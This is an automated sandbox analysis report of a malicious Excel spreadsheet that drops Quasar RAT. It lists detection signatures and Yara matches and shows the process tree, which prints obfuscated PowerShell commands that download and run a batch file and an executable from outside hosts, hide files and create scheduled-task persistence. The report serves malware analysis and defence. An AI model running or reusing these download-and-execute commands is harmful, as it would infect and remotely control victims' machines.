Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report spetsifikatsiya.xls

Overview

General Information

Sample Name:spetsifikatsiya.xls
Analysis ID:336545
MD5:2e0819723d50d0b6a2e6ffdb33778e40
SHA1:329d002fc53f93e92b99dfbc5937412b40fccf93
SHA256:04ee61f1184be78db3fd78821306e0b81e6dfaff17f6019d76e69237d6133b6a
Tags:SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM_3
Yara detected Quasar RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide a thread from the debugger
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
May check the online IP address of the machine
Obfuscated command line found
Powershell drops PE file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Obfuscated Powershell
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1100 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2384 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2864 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2356 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2928 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2320 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2908 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 2236 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 1960 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2464 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 2152 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 2196 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 2232 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 1684 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • sp.exe (PID: 1068 cmdline: 'C:\Users\user\AppData\Roaming\sp.exe' MD5: E79F542FB3F5AA6E4400953BE24780DB)
                • schtasks.exe (PID: 912 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                • sp.exe (PID: 2492 cmdline: {path} MD5: E79F542FB3F5AA6E4400953BE24780DB)
                • sp.exe (PID: 552 cmdline: {path} MD5: E79F542FB3F5AA6E4400953BE24780DB)
                  • eyBLwzbrUF1mwXoy.exe (PID: 660 cmdline: 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe' MD5: CEC5782C931581F13CE3C5D5B6A948A2)
                    • schtasks.exe (PID: 1784 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                  • ars4t7gFPGrepVgh.exe (PID: 2136 cmdline: 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe' MD5: CEC5782C931581F13CE3C5D5B6A948A2)
                    • schtasks.exe (PID: 2932 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • cmd.exe (PID: 960 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2852 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
spetsifikatsiya.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x393c2:$s1: Excel
  • 0x35aaf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x1299b:$r1: p^owersh^el^l
  • 0x12c2b:$r1: p^owersh^el^l
  • 0x12eff:$r1: p^owersh^el^l
  • 0x13143:$r1: p^owersh^el^l
  • 0x1299b:$r2: p^owersh^el^l
  • 0x12c2b:$r2: p^owersh^el^l
  • 0x12eff:$r2: p^owersh^el^l
  • 0x13143:$r2: p^owersh^el^l
dump.pcapJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\pd.batSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0xd4:$r1: p^owersh^el^l
    • 0x364:$r1: p^owersh^el^l
    • 0x5f2:$r1: p^owersh^el^l
    • 0x836:$r1: p^owersh^el^l
    • 0xd4:$r2: p^owersh^el^l
    • 0x364:$r2: p^owersh^el^l
    • 0x5f2:$r2: p^owersh^el^l
    • 0x836:$r2: p^owersh^el^l
    C:\Users\user\Documents\pd.batJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
      • 0x1a69a:$r1: p^owersh^el^l
      • 0x1a92a:$r1: p^owersh^el^l
      • 0x1abb8:$r1: p^owersh^el^l
      • 0x1adfc:$r1: p^owersh^el^l
      • 0x1cd34:$r1: p^owersh^el^l
      • 0x1cfc4:$r1: p^owersh^el^l
      • 0x1d252:$r1: p^owersh^el^l
      • 0x1d496:$r1: p^owersh^el^l
      • 0x1d74c:$r1: p^owersh^el^l
      • 0x1d9dc:$r1: p^owersh^el^l
      • 0x1dc6a:$r1: p^owersh^el^l
      • 0x1deae:$r1: p^owersh^el^l
      • 0x1a69a:$r2: p^owersh^el^l
      • 0x1a92a:$r2: p^owersh^el^l
      • 0x1abb8:$r2: p^owersh^el^l
      • 0x1adfc:$r2: p^owersh^el^l
      • 0x1cd34:$r2: p^owersh^el^l
      • 0x1cfc4:$r2: p^owersh^el^l
      • 0x1d252:$r2: p^owersh^el^l
      • 0x1d496:$r2: p^owersh^el^l
      • 0x1d74c:$r2: p^owersh^el^l
      00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
      • 0x3df1c:$s1: DoUploadAndExecute
      • 0x3e160:$s2: DoDownloadAndExecute
      • 0x3dce1:$s3: DoShellExecute
      • 0x3e118:$s4: set_Processname
      • 0x5824:$op1: 04 1E FE 02 04 16 FE 01 60
      • 0x5748:$op2: 00 17 03 1F 20 17 19 15 28
      • 0x61ae:$op3: 00 04 03 69 91 1B 40
      • 0x69fe:$op3: 00 04 03 69 91 1B 40
      00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        0000001F.00000002.2281214797.0000000002131000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
          • 0x34e9ac:$s1: DoUploadAndExecute
          • 0x3a57cc:$s1: DoUploadAndExecute
          • 0x34ebf0:$s2: DoDownloadAndExecute
          • 0x3a5a10:$s2: DoDownloadAndExecute
          • 0x34e771:$s3: DoShellExecute
          • 0x3a5591:$s3: DoShellExecute
          • 0x34eba8:$s4: set_Processname
          • 0x3a59c8:$s4: set_Processname
          • 0x3162b4:$op1: 04 1E FE 02 04 16 FE 01 60
          • 0x36d0d4:$op1: 04 1E FE 02 04 16 FE 01 60
          • 0x3161d8:$op2: 00 17 03 1F 20 17 19 15 28
          • 0x36cff8:$op2: 00 17 03 1F 20 17 19 15 28
          • 0x316c3e:$op3: 00 04 03 69 91 1B 40
          • 0x31748e:$op3: 00 04 03 69 91 1B 40
          • 0x36da5e:$op3: 00 04 03 69 91 1B 40
          • 0x36e2ae:$op3: 00 04 03 69 91 1B 40
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpackVermin_Keylogger_Jan18_1Detects Vermin KeyloggerFlorian Roth
          • 0x3ebff:$x3: GetKeyloggerLogsResponse
          • 0x3de57:$x4: GetKeyloggerLogs
          • 0x3e12f:$s1: <RunHidden>k__BackingField
          • 0x3edc7:$s2: set_SystemInfos
          • 0x3e158:$s3: set_RunHidden
          • 0x3dc8b:$s4: set_RemotePath
          • 0x56628:$s6: Client.exe
          • 0x566bc:$s6: Client.exe
          • 0x32031:$s7: xClient.Core.ReverseProxy.Packets
          35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpackxRAT_1Detects Patchwork malwareFlorian Roth
          • 0x305c0:$x4: xClient.Properties.Resources.resources
          • 0x30481:$s4: Client.exe
          • 0x3e158:$s7: set_RunHidden
          35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
          • 0x3e11c:$s1: DoUploadAndExecute
          • 0x3e360:$s2: DoDownloadAndExecute
          • 0x3dee1:$s3: DoShellExecute
          • 0x3e318:$s4: set_Processname
          • 0x5a24:$op1: 04 1E FE 02 04 16 FE 01 60
          • 0x5948:$op2: 00 17 03 1F 20 17 19 15 28
          • 0x63ae:$op3: 00 04 03 69 91 1B 40
          • 0x6bfe:$op3: 00 04 03 69 91 1B 40
          35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpackQuasar_RAT_2Detects Quasar RATFlorian Roth
          • 0x3ebff:$x1: GetKeyloggerLogsResponse
          • 0x3ee3f:$s1: DoShellExecuteResponse
          • 0x3e7ae:$s2: GetPasswordsResponse
          • 0x3ed12:$s3: GetStartupItemsResponse
          • 0x3e130:$s5: RunHidden
          • 0x3e14e:$s5: RunHidden
          • 0x3e15c:$s5: RunHidden
          • 0x3e170:$s5: RunHidden
          35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
          • 0x4f631:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 ...
          • 0x4f867:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C ...
          Click to see the 2 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\sp.exe' , ParentImage: C:\Users\user\AppData\Roaming\sp.exe, ParentProcessId: 1068, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp', ProcessId: 912
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1100, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2384
          Sigma detected: Hiding Files with Attrib.exeShow sources
          Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2908, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 2236

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exeReversingLabs: Detection: 29%
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exeReversingLabs: Detection: 29%
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeReversingLabs: Detection: 29%
          Multi AV Scanner detection for submitted fileShow sources
          Source: spetsifikatsiya.xlsVirustotal: Detection: 13%Perma Link
          Yara detected Quasar RATShow sources
          Source: Yara matchFile source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\JrekdQ.exeJoe Sandbox ML: detected
          Source: sp.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
          Source: C:\Users\user\AppData\Roaming\sp.exeCode function: 28_2_005C7F30 FindFirstFileW,GetLastError,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

          Software Vulnerabilities:

          barindex
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 4x nop then jmp 01F65B55h
          Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exeCode function: 4x nop then jmp 01F65B55h
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 4x nop then jmp 003E5B55h
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 4x nop then jmp 003E5B55h
          Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exeCode function: 4x nop then jmp 003E5B55h
          Source: global trafficDNS query: name: cutt.ly
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

          Networking:

          barindex
          Connects to many ports of the same IP (likely port scanning)Show sources
          Source: global trafficTCP traffic: 185.157.162.81 ports 1,3,1973,1972,7,9
          May check the online IP address of the machineShow sources
          Source: unknownDNS query: name: ip-api.com
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.157.162.81:1973
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:57:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Wed, 06 Jan 2021 00:13:34 GMTETag: "53b13c0-42e600-5b83031a39cfd"Accept-Ranges: bytesContent-Length: 4384256Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f ff f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 42 00 00 0a 00 00 00 00 00 00 de f8 42 00 00 20 00 00 00 00 43 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 43 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c f8 42 00 4f 00 00 00 00 00 43 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 43 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d8 42 00 00 20 00 00 00 da 42 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 06 00 00 00 00 43 00 00 08 00 00 00 dc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 43 00 00 02 00 00 00 e4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f8 42 00 00 00 00 00 48 00 00 00 02 00 05 00 20 9c 00 00 54 4f 03 00 03 00 00 00 4d 01 00 06 74 eb 03 00 18 0d 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 dd 00 00 00 01 00 00 11 00 d0 02 00 00 02 28 16 00 00 0a 28 17 00 00 0a 6f 18 00 00 0a 28 19 00 00 0a 72 01 00 00 70 28 1a 00 00 0a 0a 72 05 00 00 70 20 10 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0b 07 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 0c 08 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 39 00 00 70 20 11 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0d 09 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 04 11 04 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 4d 00 00 70 20 12 27 00 00 06 72 19 00 00 70 73 06 00 00 06 13 05 11 05 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 06 11 06 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 2a 22 02 28 1f 00 00 0a 00 2a 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 14 0a 2b 00 06 2a 00 13 30 06 00 73 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 73 21 00 00 0a 7d 05 00 00 04 02 03
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df 